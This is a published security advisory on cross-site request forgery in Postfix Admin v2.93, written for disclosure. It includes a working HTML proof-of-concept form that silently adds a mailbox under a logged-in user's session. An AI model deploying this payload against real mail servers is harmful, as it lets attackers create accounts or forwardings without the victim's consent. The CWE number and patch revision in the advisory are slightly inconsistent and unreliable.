Postfix Admin v2.93 Generic POST Cross-Site Request Forgeries

ADVISORY INFORMATION

• Product: Postfix Admin
• Vendor URL: sourceforge.net/projects/postfixadmin/
• CWE: Cross-Site Request Forgery [CWE-253]
• Date found: 2016-04-23
• Date published: 2016-05-21
• CVSS Score: 4.6 (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)
• CVE: -

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

Postfix Admin v2.93 (latest) older versions may be affected too.

INTRODUCTION

Postfix Admin is a Web Based Management tool created for Postfix. It is a PHP based application that handles Postfix Style Virtual Domains and Users that are stored in MySQL or PostgreSQL.

(from the vendor’s homepage)

VULNERABILITY DETAILS

The application “Postfix Admin” offers different configuration options via HTTP GET and HTTP POST. While GET-based operations like deleting a mailbox are protected by a CSRF-token called “token”, other functions which are based on HTTP POST like adding email forwarding settings, adding new mailboxes or adding aliases are not protected at all, which makes them vulnerable to CSRF attacks.

The following Proof-of-Concept triggers this vulnerability and adds a new mailbox:

<html>
  <body>
    <form
action="https://localhost/edit.php?table=mailbox&domain=localhost.com"
method="POST">
      <input type="hidden" name="table" value="mailbox" />
      <input type="hidden" name="value[local_part]"
value="test1234" />
      <input type="hidden" name="value[domain]"
value="localhost.com" />
      <input type="hidden" name="value[password]" value="rcesec" />
      <input type="hidden" name="value[password2]" value="rcesec" />
      <input type="hidden" name="value[name]" value="rcesec" />
      <input type="hidden" name="value[quota]" value="10000" />
      <input type="hidden" name="value[active]" value="1" />
      <input type="hidden" name="submit" value="Add Mailbox" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

RISK

To successfully exploit this vulnerability, a user must be tricked into visiting an arbitrary website while having an authenticated session in Postfix Admin. Basically both types of user accounts (mailbox users and administrators) are affected, but the mailbox user’s only exploitable functionality is adding email forwarding settings.

The vulnerability allows remote attackers to perform sensitive actions like adding new mailboxes or adding email forwardings in the authentication context of the targeted user.

SOLUTION

Checkout latest trunk including [r1843].

REPORT TIMELINE

• 2016-04-23: Discovery of the vulnerability
• 2016-04-23: Created https://sourceforge.net/p/postfixadmin/bugs/372/
• 2016-05-20: Vendor committed patch to SVN trunk r1842
• 2016-05-21: Advisory released

REFERENCES

• https://sourceforge.net/p/postfixadmin/bugs/372/